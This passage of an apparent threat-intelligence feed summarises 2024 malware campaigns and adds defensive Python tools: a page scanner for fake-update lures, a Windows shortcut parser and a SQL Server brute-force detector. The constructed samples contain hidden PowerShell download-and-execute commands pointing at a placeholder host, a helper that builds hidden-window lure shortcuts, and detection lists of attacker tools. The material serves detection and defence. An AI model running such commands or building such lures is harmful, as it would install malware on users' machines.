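                             "severity": "high" if role in POWERFUL_ROLES else "low"})
    return hits


def risky_containers(pods: dict) -> list[dict]:
    """Containers pulled from Docker Hub, and any container posing as 'pause'."""
    hits = []
    for pod in pods.get("items", []):
        ns = pod["metadata"].get("namespace", "default")
        spec = pod.get("spec", {})
        for c in spec.get("containers", []) + spec.get("initContainers", []):
            reasons = []
            if image_registry(c["image"]) == "docker.io":
                reasons.append("image from Docker Hub")
            if c["name"] == "pause" and not c["image"].startswith(OFFICIAL_PAUSE_PREFIXES):
                reasons.append("container named 'pause' with a non-infra image")
            if reasons:
                hits.append({"pod": f"{ns}/{pod['metadata']['name']}", "container": c["name"],
                             "image": c["image"], "reasons": reasons})
    return hits


# Constructed API output. system:public-info-viewer is a default binding that does
# include system:unauthenticated; the anon-admin binding is the kind of thing to hunt for.
SAMPLE_BINDINGS = json.loads("""{"items": [
 {"metadata": {"name": "system:public-info-viewer"},
  "roleRef": {"kind": "ClusterRole", "name": "system:public-info-viewer"},
  "subjects": [{"kind": "Group", "name": "system:authenticated"},
               {"kind": "Group", "name": "system:unauthenticated"}]},
 {"metadata": {"name": "anon-admin"},
  "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
  "subjects": [{"kind": "User", "name": "system:anonymous"}]}
]}""")
SAMPLE_PODS = json.loads("""{"items": [
 {"metadata": {"name": "coredns-abc", "namespace": "kube-system"},
  "spec": {"containers": [{"name": "coredns", "image": "registry.k8s.io/coredns/coredns:v1.11.1"}]}},
 {"metadata": {"name": "proxy-api", "namespace": "kube-system"},
  "spec": {"containers": [{"name": "pause", "image": "example-user/pause:latest"}]}},
 {"metadata": {"name": "web", "namespace": "default"},
  "spec": {"containers": [{"name": "web", "image": "ghcr.io/example/web:1.0"}]}}
]}""")

if __name__ == "__main__":
    print(anonymous_bindings(SAMPLE_BINDINGS))
    print(risky_containers(SAMPLE_PODS))
```

The binding check surfaces the default system:public-info-viewer grant as low severity so it can be allow-listed; anything binding system:anonymous or system:unauthenticated to a powerful role is the finding. The image check is a policy you can also enforce up front with an admission controller that only permits images from your own registries.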
Source: https://www.wiz.io/blog/dero-cryptojacking-campaign-adapts-to-evade-detection
2024-06-07
Hijacking_with_composite_alerts
MEDIUM
+
Intel Source:
Lacework
Intel Name:
Hijacking_with_composite_alerts
Date of Scan:
2024-06-07
Impact:
MEDIUM
Summary:
Lacework analysts discovered reconnaissance followed by privilege escalation to Amazon Web Services (AWS) Management Console access and then resource hijacking (T1496) of the AWS Bedrock service. The researchers believe the attacker first gained initial access to the customer's AWS environment, likely through stolen or compromised credentials.
Source: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
2024-06-07
New_threat_campaigns_involving_Darkgate
MEDIUM
+
Intel Source:
Hornet Security
Intel Name:
New_threat_campaigns_involving_Darkgate
Date of Scan:
2024-06-07
Impact:
MEDIUM
Summary:
The Hornetsecurity team has observed a new campaign distributing the DarkGate malware using a technique known as pastejacking; their monthly report contains a detailed deep-dive.
Source: https://www.hornetsecurity.com/en/threat-research/monthly-threat-report-june-2024/
2024-06-07
Fake_Google_Chrome_Update_Pop_Ups_Aim_for_Hundreds_of_Websites
LOW
+
Intel Source:
Sucuri
Intel Name:
Fake_Google_Chrome_Update_Pop_Ups_Aim_for_Hundreds_of_Websites
Date of Scan:
2024-06-07
Impact:
LOW
Summary:
Sucuri researchers have examined fake browser update campaigns, which are notorious for tricking users into installing malicious software. These campaigns usually inject malicious code into a website, which then shows a popup message urging users to update their web browser. When users click the link, malware such as infostealers or remote access trojans is downloaded.
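The SmartApeSG, ClearFake, DarkGate pastejacking and Sucuri fake-update entries above all rest on the same page-level tricks: update-nag wording, a clipboard write that carries a command, instructions to paste into the Run dialog, or a link to a script archive. As an added example (not code from Threatdown, Hornetsecurity or Sucuri), the scanner below runs those heuristics over page source and decodes base64 string literals so an encoded PowerShell command is not missed. The sample page and its command string are constructed with a placeholder host; the scoring threshold is an assumption for the illustration.

```python
from __future__ import annotations

import base64
import re

CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText\s*\(|execCommand\s*\(\s*['\"]copy['\"]\s*\)", re.I)
FAKE_UPDATE_TEXT = re.compile(
    r"update\s+(?:your\s+)?(?:browser|chrome|edge|firefox)|browser\s+is\s+out\s+of\s+date", re.I)
RUN_DIALOG_HINT = re.compile(r"win\s*\+\s*r|press\s+(?:ctrl|windows)\s*\+\s*[rv]", re.I)
SHELL_COMMAND = re.compile(
    rb"powershell|pwsh|mshta|cmd(?:\.exe)?\s+/c|rundll32|msiexec|wscript|cscript", re.I)
PAYLOAD_LINK = re.compile(r"""(?:href|src)\s*=\s*['"][^'"]+\.(?:zip|js|jse|hta|msi|exe)['"]""", re.I)
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{24,}={0,2})['\"]")


def decoded_literals(page: str) -> list[bytes]:
    """Every base64-looking quoted literal in the page, decoded; invalid ones are skipped."""
    out = []
    for lit in B64_LITERAL.findall(page):
        try:
            out.append(base64.b64decode(lit, validate=True))
        except ValueError:  # binascii.Error is a ValueError
            continue
    return out


def scan_page(page: str) -> dict:
    """Score a page for fake-update / pastejacking traits and return the reasons."""
    reasons = []
    if CLIPBOARD_WRITE.search(page):
        reasons.append("writes to the clipboard")
    if FAKE_UPDATE_TEXT.search(page):
        reasons.append("fake browser-update wording")
    if RUN_DIALOG_HINT.search(page):
        reasons.append("instructs user to open the Run dialog / paste")
    if SHELL_COMMAND.search(page.encode("utf-8", "replace")):
        reasons.append("shell command in page source")
    for blob in decoded_literals(page):
        if SHELL_COMMAND.search(blob):
            reasons.append("shell command in base64 literal: " + blob[:40].decode("latin-1"))
            break
    if PAYLOAD_LINK.search(page):
        reasons.append("link to script/archive payload")
    # two independent traits together are rarely innocent (assumed threshold)
    return {"reasons": reasons, "verdict": "suspicious" if len(reasons) >= 2 else "clean"}


# Constructed ClearFake-style page: the command is encoded at build time so the
# plaintext never appears in the HTML, exactly the case the decoder is for.
CONSTRUCTED_COMMAND = b'powershell -w hidden -c "iwr http://example.invalid/loader -UseBasicParsing | iex"'
SAMPLE_PAGE = (
    "<html><body><h2>Your browser is out of date</h2>"
    "<p>To update, press Windows + R, paste with CTRL + V and press Enter.</p>"
    "<button onclick=\"navigator.clipboard.writeText(atob('"
    + base64.b64encode(CONSTRUCTED_COMMAND).decode() + "'))\">Fix it</button>"
    "</body></html>"
)
BENIGN_PAGE = "<html><body><p>Copy the link below.</p><a href='/docs/guide.pdf'>Guide</a></body></html>"

if __name__ == "__main__":
    print(scan_page(SAMPLE_PAGE))
    print(scan_page(BENIGN_PAGE))
```

Run this over the rendered DOM rather than the raw HTML when the injection lives in a JavaScript library such as jQuery, since the lure markup is often only built at runtime. On the endpoint side, the same campaigns leave a trace in the Run dialog history and in PowerShell process creations whose parent is explorer.exe.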
Source: https://blog.sucuri.net/2024/06/hundreds-sites-targeted-by-fake-chrome-update-pop-ups.html
2024-06-07
Delivery_of_Vidar_stealer_by_AutoIt
MEDIUM
+
Intel Source:
Esentire
Intel Name:
Delivery_of_Vidar_stealer_by_AutoIt
Date of Scan:
2024-06-07
Impact:
MEDIUM
Summary:
Last month, eSentire researchers observed an attack involving a fake KMSPico activator tool that delivered Vidar Stealer. The attack leveraged Java dependencies and a malicious AutoIt script to disable Windows Defender and then decrypt the Vidar payload via shellcode. In this case the user searched the web for KMSPico and browsed to the top result (kmspico[.]ws). KMSPico is a "universal activator" for Windows that appears to no longer be maintained.
Source: https://www.esentire.com/blog/autoit-delivering-vidar-stealer-via-drive-by-downloads
2024-06-07
More_eggs_Activity_Persists_Via_Fake_Job_Applicant_Lures
MEDIUM
+
Intel Source:
Esentire
Intel Name:
More_eggs_Activity_Persists_Via_Fake_Job_Applicant_Lures
Date of Scan:
2024-06-07
Impact:
MEDIUM
Summary:
eSentire's threat researchers have identified a More_eggs malware campaign targeting an industrial services client. More_eggs is malicious software designed to steal credentials for corporate bank and email accounts and is sold on the dark web as Malware-as-a-Service (MaaS). The malware was created by the Golden Chickens group (aka Venom Spider) and is used by FIN6, Evilnum, and the Cobalt Group. In this campaign, the attacker posed as a job applicant and lured a recruiter into downloading a fake resume from a malicious site. When the recruiter clicked the 'Download CV' button, a malicious Windows shortcut file (LNK) named "Christian C. Velour" was downloaded. This file contained a hidden command to download a malicious DLL, a tactic similar to those seen in early 2022.
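Both the Mustang Panda entry above and this More_eggs case hinge on a Windows shortcut (.lnk) whose real command line is hidden from the user. The following is an added example, not code from Cyble or eSentire: a minimal Shell Link parser following the MS-SHLLINK layout (fixed 76-byte header, optional LinkTargetIDList and LinkInfo, then the StringData strings in flag order), with a triage function over the recovered command line and ShowCommand value. The shortcuts it inspects are built by the included helper and are constructed samples, not the lure files from the reports.

```python
from __future__ import annotations

import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags (MS-SHLLINK 2.1.1); StringData fields appear in this bit order.
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))
SW_SHOWMINNOACTIVE = 7  # ShowCommand that keeps the launched window out of sight
SUSPICIOUS_TOKENS = ("powershell", "pwsh", "cmd.exe", "cmd /c", "mshta", "rundll32", "regsvr32",
                     "wscript", "cscript", "certutil", "bitsadmin", "http://", "https://",
                     "-enc", "downloadstring", "iex")


def parse_lnk(data: bytes) -> dict:
    """Minimal Shell Link parser: header fields plus the StringData strings."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                       # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "show_command": show_command}
    width = 2 if flags & IS_UNICODE else 1
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)  # CountCharacters, no terminator
        pos += 2
        raw = data[pos:pos + count * width]
        pos += count * width
        info[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return info


def triage_lnk(data: bytes) -> list[str]:
    """Explain why a shortcut looks like a downloader, or return [] if it looks plain."""
    info = parse_lnk(data)
    command = f"{info.get('relative_path', '')} {info.get('arguments', '')}".lower()
    reasons = [f"command line contains {tok!r}" for tok in SUSPICIOUS_TOKENS if tok in command]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (hidden window)")
    if len(info.get("arguments", "")) > 260:
        reasons.append("unusually long argument string")
    return reasons


def build_lnk(relative_path: str, arguments: str, working_dir: str = "", show_command: int = 1) -> bytes:
    """Assemble a minimal .lnk (used here only to construct samples for the parser)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    id_list = struct.pack("<HH", 2, 0)  # empty IDList: size 2, TerminalID only
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, working_dir, arguments))
    return header + id_list + strings


# Constructed samples, not the lure files from the reports; host is a placeholder.
LURE_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    r'/c powershell -w hidden -c "iwr http://example.invalid/stage -OutFile %TEMP%\s.dll; rundll32 %TEMP%\s.dll,Run"',
    working_dir=r"%TEMP%", show_command=SW_SHOWMINNOACTIVE)
PLAIN_LNK = build_lnk(r"..\Documents\Resume.pdf", "", working_dir=r"C:\Users\alice\Documents")

if __name__ == "__main__":
    print(parse_lnk(LURE_LNK))
    print(triage_lnk(LURE_LNK))
```

The parser deliberately skips the IDList and LinkInfo blocks rather than decoding them, because the command line and ShowCommand are what decide triage; a production tool would also read the ExtraData blocks, which carry the machine ID and MAC of the host that created the shortcut.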
Source: https://www.esentire.com/blog/more-eggs-activity-persists-via-fake-job-applicant-lures
2024-06-07
Sticky_Werewolf_Latest_Malicious_Aviation_Attacks
LOW
+
Intel Source:
Morphisec
Intel Name:
Sticky_Werewolf_Latest_Malicious_Aviation_Attacks
Date of Scan:
2024-06-07
Impact:
LOW
Summary:
Morphisec Labs has discovered the campaign of Sticky Werewolf, a cyber threat group first detected in April 2023. This group is active and targets different sectors with political or hacktivist motives. Initially, they attacked public organizations in Russia and Belarus, but now they have expanded to areas like pharmaceuticals and microbiology. Recently, they have targeted the aviation industry using phishing emails that appear to come from a Moscow aerospace company. These emails contain files that lure recipients into running malicious software hosted on WebDAV servers. Once activated, the malware installs itself, avoids detection, and steals data.
Source: https://blog.morphisec.com/sticky-werewolfs-aviation-attacks
2024-06-06
Malicious_Python_Script_with_a_Best_Before_Date
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Malicious_Python_Script_with_a_Best_Before_Date
Date of Scan:
2024-06-06
Impact:
LOW
Summary:
Researchers at ISC SANS have examined an amusing malicious Python script with a built-in expiry date: it only executes before a specified time (June 10th in this case). The script's objective is straightforward: retrieve a payload from a remote location, write it into memory, and start a new thread. Such payloads are typically associated with Cobalt Strike.
Source: https://isc.sans.edu/diary/rss/30988
2024-06-06
Muhstik_malware_targets_message_applications
LOW
+
Intel Source:
Aquasec
Intel Name:
Muhstik_malware_targets_message_applications
Date of Scan:
2024-06-06
Impact:
LOW
Summary:
Aqua Nautilus analysts observed a new Muhstik malware campaign targeting message queuing applications such as the Apache RocketMQ platform. The attackers exploited a known vulnerability in the platform. The analysis covers how the attackers exploit the RocketMQ vulnerability, how the Muhstik malware affects compromised instances, and how many RocketMQ instances worldwide are exposed to this attack.
Source: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
2024-06-06
Operation_ControlPlug_malicious_activities
MEDIUM
+
Intel Source:
NTT Security
Intel Name:
Operation_ControlPlug_malicious_activities
Date of Scan:
2024-06-06
Impact:
MEDIUM
Summary:
The threat group DarkPeony, also known as Operation ControlPlug, employed a novel technique involving MSC (Microsoft Common Console Document) files to initiate their malicious activities. These files leveraged the Console Taskpad feature to execute PowerShell scripts that downloaded and executed malware, ultimately leading to the deployment of PlugX.
Source: https://jp.security.ntt/tech_blog/controlplug
2024-06-06
An_Attack_of_Vermin_Uses_SPECTR_WPS_in_Conjunction_With_SickSync_Campaign
LOW
+
Intel Source:
CERT-UA
Intel Name:
An_Attack_of_Vermin_Uses_SPECTR_WPS_in_Conjunction_With_SickSync_Campaign
Date of Scan:
2024-06-06
Impact:
LOW
Summary:
Researchers from CERT-UA have identified and examined activity by the UAC-0020 (Vermin) group directed at the Ukrainian Defense Forces. The attack was carried out with the SPECTR malware, which has been known since 2019. At the same time, the standard synchronization functionality of the legitimate SyncThing software was used to exfiltrate stolen documents, files, passwords, and other information from the computer; among other things, the software establishes a peer-to-peer connection between computers.
Source: https://cert.gov.ua/article/6279600
2024-06-06
Chinese_Cyber_Espionage_Campaigns_Targeting_Southeast_Asian_Government
MEDIUM
+
Intel Source:
sophos
Intel Name:
Chinese_Cyber_Espionage_Campaigns_Targeting_Southeast_Asian_Government
Date of Scan:
2024-06-06
Impact:
MEDIUM
Summary:
Researchers from Sophos have discovered that Chinese state-sponsored hackers have been targeting a Southeast Asian government since March 2022. The Sophos investigation identified two groups of hackers, called Cluster Alpha and Cluster Charlie, which appear to be working under a central authority aligned with Chinese interests. Cluster Alpha stopped its activity in August 2023, but Cluster Charlie resumed after a short break, using more advanced techniques such as web shells and different command and control channels to access networks and steal data.
Source: https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-sophos-threat-hunting-unveils-multiple-clusters-of-chinese-state-sponsored-activity-targeting-southeast-asia/
2024-06-06
Noise_in_Open_Source_Threat_Detection_is_Detected_by_Python_Downloader
LOW
+
Intel Source:
ReversingLabs
Intel Name:
Noise_in_Open_Source_Threat_Detection_is_Detected_by_Python_Downloader
Date of Scan:
2024-06-06
Impact:
LOW
Summary:
Researchers from ReversingLabs have discovered a malicious, open source package: xFileSyncerx, on the Python Package Index (PyPI). With nearly 300 downloads, this package included malicious wiper components. However, further investigation revealed that these were created by a cybersecurity professional for "red team" penetration testing of a client's Security Operations Center (SOC), not as a genuine open source threat.
Source: https://www.reversinglabs.com/blog/python-downloader-highlights-noise-problem-in-open-source-threat-detection
2024-06-06
The_analysis_of_the_Wineloader_backdoor_malware
MEDIUM
+
Intel Source:
Binarydefense
Intel Name:
The_analysis_of_the_Wineloader_backdoor_malware
Date of Scan:
2024-06-06
Impact:
MEDIUM
Summary:
ARC Labs recently analyzed the Wineloader backdoor, a modular malware attributed to the APT29 threat group, which allows further tools or modules to be downloaded through an encrypted command and control channel. It starts with a phishing email luring targets with a wine-tasting event invitation. Executing the obfuscated HTA file downloads the Wineloader payload, which utilizes sideloading and creates scheduled tasks or registry entries for persistence.
Source: https://www.binarydefense.com/resources/blog/wineloader-analysis-of-the-infection-chain/
2024-06-06
A_New_Cryptojacking_Attack_Abusing_Docker_Remote_API_Servers_Named_Commando_Cat
LOW
+
Intel Source:
Trend Micro
Intel Name:
A_New_Cryptojacking_Attack_Abusing_Docker_Remote_API_Servers_Named_Commando_Cat
Date of Scan:
2024-06-06
Impact:
LOW
Summary:
Trend Micro researchers discovered an attack campaign abusing exposed Docker remote API servers to deploy cryptocurrency miners. The campaign is called Commando Cat because its first stage installs benign containers built by the publicly available Commando project (an open-source GitHub project that builds Docker images on demand for developers).
Source: https://www.trendmicro.com/en_us/research/24/f/commando-cat-a-novel-cryptojacking-attack-.html
2024-06-06
New_detection_of_attacks_targeting_MS_SQL_servers
MEDIUM
+
Intel Source:
ASEC
Intel Name:
New_detection_of_attacks_targeting_MS_SQL_servers
Date of Scan:
2024-06-06
Impact:
MEDIUM
Summary:
ASEC continuously monitors attacks targeting MS-SQL servers and shares new attack cases on its blog. The post covers cases in which attackers gain initial access through brute-force and dictionary attacks against exposed servers and then enable command execution on the compromised instance.
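An added example, not ASEC's code, for the MS-SQL cases above (this entry and the ERP server entry): a sliding-window brute-force detector over SQL Server ERRORLOG lines, which distinguishes a single-account password spray from a dictionary run across many logins, plus a check for xp_cmdshell being switched on, the usual route to command execution once a login succeeds. The log lines are constructed, with a documentation-range client address.

```python
from __future__ import annotations

import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# SQL Server ERRORLOG: "<timestamp> Logon  Login failed for user '<name>'. Reason: ... [CLIENT: <ip>]"
LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+Login failed for user '(?P<user>[^']*)'\."
    r".*\[CLIENT: (?P<ip>[0-9a-fA-F.:]+)\]")
# Logged by sp_configure when xp_cmdshell is turned on.
XP_CMDSHELL_ON = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+.*Configuration option 'xp_cmdshell' changed from 0 to 1")


def parse_failures(lines):
    """Yield (timestamp, user, client_ip) for every failed-login line, in log order."""
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["user"], m["ip"]


def detect_bruteforce(lines, threshold: int = 5, window_seconds: int = 60) -> list[dict]:
    """Sliding-window count of failed logins per client; one alert per offending client."""
    window = timedelta(seconds=window_seconds)
    recent: dict[str, deque] = defaultdict(deque)  # ip -> deque of (ts, user)
    alerts: dict[str, dict] = {}
    for ts, user, ip in parse_failures(lines):
        q = recent[ip]
        q.append((ts, user))
        while q and ts - q[0][0] > window:   # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold:
            users = sorted({u for _, u in q})
            alerts[ip] = {
                "client": ip, "failures_in_window": len(q), "users": users,
                "kind": "dictionary (many users)" if len(users) > 1 else "brute force (one user)",
                "last_seen": ts.isoformat(),
            }
    return list(alerts.values())


def xp_cmdshell_enabled(lines) -> list[str]:
    """Timestamps at which xp_cmdshell was enabled; each one deserves a ticket."""
    return [m["ts"] for line in lines if (m := XP_CMDSHELL_ON.match(line))]


# Constructed ERRORLOG excerpt (not real logs); 203.0.113.0/24 is a documentation range.
SAMPLE_ERRORLOG = """\
2024-06-05 10:12:01.23 Logon       Error: 18456, Severity: 14, State: 8.
2024-06-05 10:12:01.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.9]
2024-06-05 10:12:02.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.9]
2024-06-05 10:12:02.88 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.9]
2024-06-05 10:12:03.41 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.9]
2024-06-05 10:12:04.07 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.9]
2024-06-05 10:12:04.55 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.9]
2024-06-05 10:30:15.00 Logon       Login failed for user 'erp_app'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.25]
2024-06-05 11:02:42.61 spid57      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
""".splitlines()

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_ERRORLOG):
        print(alert)
    print("xp_cmdshell enabled at:", xp_cmdshell_enabled(SAMPLE_ERRORLOG))
```

The ERRORLOG only records failures by default, so a successful login that follows a burst of failures from the same client has to come from a login audit (server audit or SQL Server Audit) to complete the picture; the xp_cmdshell check is the next best signal that the attacker got in.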
Source: https://asec.ahnlab.com/en/66282/
2024-06-05
DarkGate_switches_up_its_tactics_with_new_payload_email_templates
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
DarkGate_switches_up_its_tactics_with_new_payload_email_templates
Date of Scan:
2024-06-05
Impact:
MEDIUM
Summary:
Cisco Talos has uncovered a malicious email campaign that has delivered DarkGate malware through MS Excel attachments since March. The emails use a technique called remote template injection to bypass email security and lure users into downloading the malware. This campaign primarily targets the U.S., with healthcare technologies and telecommunications the most affected sectors. DarkGate is known for spreading silently, stealing data, and avoiding detection, with serious impact on both individuals and organizations. The campaign has switched from AutoIt to AutoHotkey scripts, which let the malware operate directly in memory without being written to disk, showing how DarkGate operators change tactics to avoid detection.
Source: https://blog.talosintelligence.com/darkgate-remote-template-injection/
2024-06-05
Lost_in_the_Fog_A_New_Ransomware_Threat
MEDIUM
Intel Source:
Arctic Wolf Labs
Intel Name:
Lost_in_the_Fog_A_New_Ransomware_Threat
Date of Scan:
2024-06-05
Impact:
MEDIUM
Summary:
Arctic Wolf Labs discovered a new ransomware variant known as Fog in May of this year, focusing on U.S. organizations, particularly in the education and recreation sectors. The attackers gained access to systems through compromised VPN credentials, used techniques such as pass-the-hash and credential stuffing, and disabled Windows Defender. They encrypted files stored in VM storage, deleted backups, and left ransom notes containing a unique chat code for communication. Their actions suggest a financial motive, primarily targeting the education sector for swift payouts. This highlights the importance of secure backups and strong defenses against such attacks.
Source: https://arcticwolf.com/resources/blog/lost-in-the-fog-a-new-ransomware-threat/
2024-06-05
TargetCompany_Linux_Variant_Targeting_ESXi_Environments
LOW
Intel Source:
Trend Micro
Intel Name:
TargetCompany_Linux_Variant_Targeting_ESXi_Environments
Date of Scan:
2024-06-05
Impact:
LOW
Summary:
Researchers from Trend Micro have discovered a new Linux variant of ransomware used by the TargetCompany group, specifically targeting ESXi environments. This variant employs a custom shell script for payload delivery and execution, marking a departure from previous versions. Additionally, the script sends the victim's information to two separate servers, ensuring the attackers have a backup.
Source: https://www.trendmicro.com/en_us/research/24/f/targetcompany-s-linux-variant-targets-esxi-environments.html
2024-06-05
DNS_PROBING_OPERATION
LOW
Intel Source:
Infoblox
Intel Name:
DNS_PROBING_OPERATION
Date of Scan:
2024-06-05
Impact:
LOW
Summary:
Infoblox has uncovered a large-scale operation named Secshow, which has been probing DNS resolvers around the world since 2023 using servers from China's Education and Research Network (CERNET). The operation stands out because of its invasive nature and the many questions it raises. Secshow sends DNS queries that encode information used to identify open DNS resolvers and evaluate their behavior. This generates a large volume of unnecessary DNS traffic, making it difficult for researchers to accurately study and track malicious activity. The Secshow operation, which used various techniques for extracting resolver information, ceased in May 2024.
Source: https://blogs.infoblox.com/threat-intelligence/what-a-show-an-amplified-internet-scale-dns-probing-operation/
2024-06-05
Huge_Utility_Scam_Campaign_Using_Online_Advertising_to_Target_Consumers
LOW
Intel Source:
Malwarebytes
Intel Name:
Huge_Utility_Scam_Campaign_Using_Online_Advertising_to_Target_Consumers
Date of Scan:
2024-06-05
Impact:
LOW
Summary:
Researchers at Malwarebytes have discovered a common utility scam that relies on fake online advertisements. Scammers take advantage of people looking for help with their energy bills, using sophisticated tactics to extract money and personal data.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/02/massive-utility-scam-campaign-spreads-via-online-ads
2024-06-05
Utilizing_BoxedApp_Products_Abuse_to_Spread_Several_Malware_Families
LOW
Intel Source:
CheckPoint
Intel Name:
Utilizing_BoxedApp_Products_Abuse_to_Spread_Several_Malware_Families
Date of Scan:
2024-06-05
Impact:
LOW
Summary:
Check Point researchers have been monitoring the increasing abuse of BoxedApp products for several months and have identified how they are exploited to deploy various known malware families, particularly RATs and stealers. The vast majority of the attributable malicious samples were used in attacks on financial institutions and government organizations. Packing the malicious payloads allowed the attackers to reduce detection, hinder analysis, and take advantage of additional capabilities of the BoxedApp SDK (for example, Virtual Storage) without having to build them from scratch.
Source: https://research.checkpoint.com/2024/inside-the-box-malwares-new-playground/
2024-06-05
SmallTiger_Malware_Targeting_Domestic_Industries
LOW
Intel Source:
ASEC
Intel Name:
SmallTiger_Malware_Targeting_Domestic_Industries
Date of Scan:
2024-06-05
Impact:
LOW
Summary:
Researchers from ASEC have discovered and responded to attacks involving the SmallTiger malware, which targeted several domestic companies. While the initial method of infiltration remains unclear, the attackers used SmallTiger to move laterally within the organizations. The affected companies include those in the defense sector, automobile parts industry, and semiconductor manufacturing.
Source: https://asec.ahnlab.com/ko/65918/
2024-06-05
A_Caution_Against_Phishing_Emails_That_Request_Pasting_Orders
LOW
Intel Source:
ASEC
Intel Name:
A_Caution_Against_Phishing_Emails_That_Request_Pasting_Orders
Date of Scan:
2024-06-05
Impact:
LOW
Summary:
Researchers from ASEC have found that emails are being used to spread phishing files. The HTML phishing files attached to the emails direct users to paste (CTRL+V) and execute commands. The threat actor sent emails about fee processing, operating instruction reviews, and similar topics to entice users to open the attachments. When a user opens an HTML file, a background and a message masquerading as MS Word are shown. The notification instructs the user to click the "How to Fix" option to view the Word document offline.
Source: https://asec.ahnlab.com/en/66300/
2024-06-05
RansomHub_Origins_in_Older_Knight
MEDIUM
Intel Source:
Symantec
Intel Name:
RansomHub_Origins_in_Older_Knight
Date of Scan:
2024-06-05
Impact:
MEDIUM
Summary:
Symantec researchers have discovered a new Ransomware-as-a-Service (RaaS) named RansomHub, which has quickly grown to become one of the largest ransomware groups active today. It is most likely an updated and renamed version of the older Knight ransomware. Analysis of the RansomHub payload indicated a high degree of similarity between the two threats, implying that Knight acts as the starting point for RansomHub.
Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomhub-knight-ransomware
2024-06-05
Exploiting_Avast_Proxy_and_Windows_Security_Center_to_Disable_Windows_Defender
LOW
Intel Source:
ISC.SANS
Intel Name:
Exploiting_Avast_Proxy_and_Windows_Security_Center_to_Disable_Windows_Defender
Date of Scan:
2024-06-05
Impact:
LOW
Summary:
Researchers from ISC.SANS have discovered a utility that can disable Windows Defender by exploiting the Windows Security Center (WSC) registration process. This utility uses a proxy app bundled with Avast to access WSC APIs, registering itself as a fraudulent antivirus provider, which forces Windows Defender to deactivate, though periodic scanning can still be enabled manually.
Source: https://isc.sans.edu/diary/rss/30980
2024-06-05
Threat_Actor_Systems_Can_Be_Exposed_and_Used_by_Other_Threat_Actors
LOW
Intel Source:
ASEC
Intel Name:
Threat_Actor_Systems_Can_Be_Exposed_and_Used_by_Other_Threat_Actors
Date of Scan:
2024-06-05
Impact:
LOW
Summary:
Researchers from ASEC have verified an instance where a ransomware threat actor used a Remote Desktop Protocol (RDP) scan attack to target the proxy server of a CoinMiner attacker. The RDP scan attack by the other threat actor reached the port that the CoinMiner threat actor had opened to connect to the proxy server, which gave them access to the infected botnet. As a result, the RDP scan attack was carried out against the CoinMiner botnet, infecting it with ransomware.
Source: https://asec.ahnlab.com/en/66372/
2024-06-05
Fake_Advanced_IP_Scanner_Installer_Delivers_Dangerous_CobaltStrike_Backdoor
LOW
Intel Source:
Trustwave
Intel Name:
Fake_Advanced_IP_Scanner_Installer_Delivers_Dangerous_CobaltStrike_Backdoor
Date of Scan:
2024-06-05
Impact:
LOW
Summary:
